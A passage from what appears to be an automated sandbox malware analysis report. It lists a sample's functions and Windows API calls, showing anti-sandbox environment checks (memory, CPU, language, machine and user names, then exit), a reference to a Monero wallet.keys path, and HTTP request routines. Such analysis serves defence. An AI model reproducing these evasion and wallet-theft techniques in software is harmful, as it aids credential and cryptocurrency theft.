                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                • String ID: :$C$\
                                • API String ID: 1544550907-3809124531
                                • Opcode ID: 8ec90a34a41480e47e854d20808bf1b859787f2b20e6f82e05e4788e251e9a02
                                • Instruction ID: 751ef2660b4ab1d7509dcee35dbd285a9214f706cbc03ccfbc2c1e9e63298ab5
                                • Opcode Fuzzy Hash: 8ec90a34a41480e47e854d20808bf1b859787f2b20e6f82e05e4788e251e9a02
                                • Instruction Fuzzy Hash: 58417FB1E04358EBDB11DF94DC45BEEBBB8EB08704F10419AF50967280E779AA44CBB5
                                Function 00DD69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00DD9860: GetProcAddress.KERNEL32(74DD0000,01622470), ref: 00DD98A1
                                  • Part of subcall function 00DD9860: GetProcAddress.KERNEL32(74DD0000,016222F0), ref: 00DD98BA
                                  • Part of subcall function 00DD9860: GetProcAddress.KERNEL32(74DD0000,01622290), ref: 00DD98D2
                                  • Part of subcall function 00DD9860: GetProcAddress.KERNEL32(74DD0000,016223E0), ref: 00DD98EA
                                  • Part of subcall function 00DD9860: GetProcAddress.KERNEL32(74DD0000,016224A0), ref: 00DD9903
                                  • Part of subcall function 00DD9860: GetProcAddress.KERNEL32(74DD0000,01628F38), ref: 00DD991B
                                  • Part of subcall function 00DD9860: GetProcAddress.KERNEL32(74DD0000,01615910), ref: 00DD9933
                                  • Part of subcall function 00DD9860: GetProcAddress.KERNEL32(74DD0000,01615930), ref: 00DD994C
                                  • Part of subcall function 00DD9860: GetProcAddress.KERNEL32(74DD0000,01622218), ref: 00DD9964
                                  • Part of subcall function 00DD9860: GetProcAddress.KERNEL32(74DD0000,016223B0), ref: 00DD997C
                                  • Part of subcall function 00DD9860: GetProcAddress.KERNEL32(74DD0000,01622320), ref: 00DD9995
                                  • Part of subcall function 00DD9860: GetProcAddress.KERNEL32(74DD0000,01622440), ref: 00DD99AD
                                  • Part of subcall function 00DD9860: GetProcAddress.KERNEL32(74DD0000,016159B0), ref: 00DD99C5
                                  • Part of subcall function 00DD9860: GetProcAddress.KERNEL32(74DD0000,016222A8), ref: 00DD99DE
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DC11D0: ExitProcess.KERNEL32 ref: 00DC1211
                                  • Part of subcall function 00DC1160: GetSystemInfo.KERNEL32(?), ref: 00DC116A
                                  • Part of subcall function 00DC1160: ExitProcess.KERNEL32 ref: 00DC117E
                                  • Part of subcall function 00DC1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00DC112B
                                  • Part of subcall function 00DC1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00DC1132
                                  • Part of subcall function 00DC1110: ExitProcess.KERNEL32 ref: 00DC1143
                                  • Part of subcall function 00DC1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00DC123E
                                  • Part of subcall function 00DC1220: ExitProcess.KERNEL32 ref: 00DC1294
                                  • Part of subcall function 00DD6770: GetUserDefaultLangID.KERNEL32 ref: 00DD6774
                                  • Part of subcall function 00DC1190: ExitProcess.KERNEL32 ref: 00DC11C6
                                  • Part of subcall function 00DD7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00DC11B7), ref: 00DD7880
                                  • Part of subcall function 00DD7850: RtlAllocateHeap.NTDLL(00000000), ref: 00DD7887
                                  • Part of subcall function 00DD7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00DD789F
                                  • Part of subcall function 00DD78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DD7910
                                  • Part of subcall function 00DD78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00DD7917
                                  • Part of subcall function 00DD78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00DD792F
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,016290B8,?,00DE110C,?,00000000,?,00DE1110,?,00000000,00DE0AEF), ref: 00DD6ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00DD6AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00DD6AF9
                                • Sleep.KERNEL32(00001770), ref: 00DD6B04
                                • CloseHandle.KERNEL32(?,00000000,?,016290B8,?,00DE110C,?,00000000,?,00DE1110,?,00000000,00DE0AEF), ref: 00DD6B1A
                                • ExitProcess.KERNEL32 ref: 00DD6B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                • String ID:
                                • API String ID: 2931873225-0
                                • Opcode ID: 65f229a0ce07b31e8857845a435aecdd9a12eb218c35c443b237118e81fde54a
                                • Instruction ID: b3d67fb0035381574fdb1f5f8460d9c7656d73e97f832ae9eeac960f82c8fc58
                                • Opcode Fuzzy Hash: 65f229a0ce07b31e8857845a435aecdd9a12eb218c35c443b237118e81fde54a
                                • Instruction Fuzzy Hash: 02312F70A40219AADB05FBF4DC56FEE7738EF04300F50851AF642A2282DF75A905DBB6
                                Function 00DD6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1436 dd6af3 1437 dd6b0a 1436->1437 1439 dd6b0c-dd6b22 call dd6920 call dd5b10 CloseHandle ExitProcess 1437->1439 1440 dd6aba-dd6ad7 call ddaad0 OpenEventA 1437->1440 1446 dd6ad9-dd6af1 call ddaad0 CreateEventA 1440->1446 1447 dd6af5-dd6b04 CloseHandle Sleep 1440->1447 1446->1439 1447->1437
                                APIs
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,016290B8,?,00DE110C,?,00000000,?,00DE1110,?,00000000,00DE0AEF), ref: 00DD6ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00DD6AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00DD6AF9
                                • Sleep.KERNEL32(00001770), ref: 00DD6B04
                                • CloseHandle.KERNEL32(?,00000000,?,016290B8,?,00DE110C,?,00000000,?,00DE1110,?,00000000,00DE0AEF), ref: 00DD6B1A
                                • ExitProcess.KERNEL32 ref: 00DD6B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                • String ID:
                                • API String ID: 941982115-0
                                • Opcode ID: 529e6353ecf24a43facb1374e9b41811afd8df4befaafdd4144a21db9e368fdc
                                • Instruction ID: a1ced10452afe4cc0ae1d578e706f443ea6d37b2abd254c4b8e52d529b33707b
                                • Opcode Fuzzy Hash: 529e6353ecf24a43facb1374e9b41811afd8df4befaafdd4144a21db9e368fdc
                                • Instruction Fuzzy Hash: E0F03A30A40319EEEB10ABA09C06BBD7A34FB04701F108517B583A22C5DBB59540DBB6
                                Function 00DC47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00DC4839
                                • InternetCrackUrlA.WININET(00000000,00000000), ref: 00DC4849
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1274457161-4251816714
                                • Opcode ID: c4021c753d0111b2c199bc8e52c9abe088f63d3b9e2c8a8bcb225c279ceedd6c
                                • Instruction ID: fde87ba9d95dad7b0c7e5df290b0574374b127032f1899dbf88641bb2ade9204
                                • Opcode Fuzzy Hash: c4021c753d0111b2c199bc8e52c9abe088f63d3b9e2c8a8bcb225c279ceedd6c
                                • Instruction Fuzzy Hash: CE213E71D00209ABDF14DFA4E845ADD7B78FB45320F108626F959A7280EB706A05CBA1
                                Function 00DD51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00DDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DDA7E6
                                  • Part of subcall function 00DC6280: InternetOpenA.WININET(00DE0DFE,00000001,00000000,00000000,00000000), ref: 00DC62E1
                                  • Part of subcall function 00DC6280: StrCmpCA.SHLWAPI(?,0162EA98), ref: 00DC6303
                                  • Part of subcall function 00DC6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00DC6335
                                  • Part of subcall function 00DC6280: HttpOpenRequestA.WININET(00000000,GET,?,0162E278,00000000,00000000,00400100,00000000), ref: 00DC6385
                                  • Part of subcall function 00DC6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00DC63BF
                                  • Part of subcall function 00DC6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DC63D1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00DD5228
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                • String ID: ERROR$ERROR
                                • API String ID: 3287882509-2579291623
                                • Opcode ID: 16de92c576fdda2e77d67ccd08491a5ee8392cd3429dae8f4aa6fc7df9ac9556
                                • Instruction ID: 4e4335f9bd68599d651c163c476dd8ef5819bef4022aac428c222fa8ffa106dc
                                • Opcode Fuzzy Hash: 16de92c576fdda2e77d67ccd08491a5ee8392cd3429dae8f4aa6fc7df9ac9556
                                • Instruction Fuzzy Hash: 7911EC30910158AACB14FF68DD52AED7738EF50300F808159F81A5B692EF74AB09D7B5
                                Function 00DC1220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1493 dc1220-dc1247 call dd89b0 GlobalMemoryStatusEx 1496 dc1249-dc1271 call ddda00 * 2 1493->1496 1497 dc1273-dc127a 1493->1497 1498 dc1281-dc1285 1496->1498 1497->1498 1500 dc129a-dc129d 1498->1500 1501 dc1287 1498->1501 1503 dc1289-dc1290 1501->1503 1504 dc1292-dc1294 ExitProcess 1501->1504 1503->1500 1503->1504
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00DC123E
                                • ExitProcess.KERNEL32 ref: 00DC1294
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 803317263-2766056989
                                • Opcode ID: 2586608c0d3dee5ef27ae79fe90cf0726b3401bab951d05e24632c073506d11b
                                • Instruction ID: dcb9b8f25f0b07b56526ccca6408ed3df0ca68d7fdf3abbef0eb438c7a357d2a
                                • Opcode Fuzzy Hash: 2586608c0d3dee5ef27ae79fe90cf0726b3401bab951d05e24632c073506d11b
                                • Instruction Fuzzy Hash: C8014FB4980318EAEF10EBD4CC4AFADB778EB15701F248149E605B7281D67455418BA9
                                Function 00DC1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00DC112B
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 00DC1132
                                • ExitProcess.KERNEL32 ref: 00DC1143
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AllocCurrentExitNumaVirtual
                                • String ID:
                                • API String ID: 1103761159-0
                                • Opcode ID: 6905644567d5b98c1fff9c3a8099820f05b13e08099d49984a9219da64579622
                                • Instruction ID: ce94b053fd87ab7a9a933261b04710014fee691b07e6bd9b6db450db4a348936
                                • Opcode Fuzzy Hash: 6905644567d5b98c1fff9c3a8099820f05b13e08099d49984a9219da64579622
                                • Instruction Fuzzy Hash: 98E0E674A45318FFE7216BA09C0AF097678EB05B01F104055F709771C5D6B9664097A9
                                Function 00DC10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00DC10B3
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00DC10F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocFree
                                • String ID:
                                • API String ID: 2087232378-0
                                • Opcode ID: a50791db8210410e6a421ff1f1072c0946007d43516d82cd2574355ba468f670
                                • Instruction ID: a0263e541f5c97a438e87253afffeed17d8b578b1aa52ad29afac372875bbcaf
                                • Opcode Fuzzy Hash: a50791db8210410e6a421ff1f1072c0946007d43516d82cd2574355ba468f670
                                • Instruction Fuzzy Hash: 67F0E275641318BBEB149AA4AC59FAAB7E8E705B15F301448F544E3280D5729F00DBA0
                                Function 00DC1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00DD78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DD7910
                                  • Part of subcall function 00DD78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00DD7917
                                  • Part of subcall function 00DD78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00DD792F
                                  • Part of subcall function 00DD7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00DC11B7), ref: 00DD7880
                                  • Part of subcall function 00DD7850: RtlAllocateHeap.NTDLL(00000000), ref: 00DD7887
                                  • Part of subcall function 00DD7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00DD789F
                                • ExitProcess.KERNEL32 ref: 00DC11C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
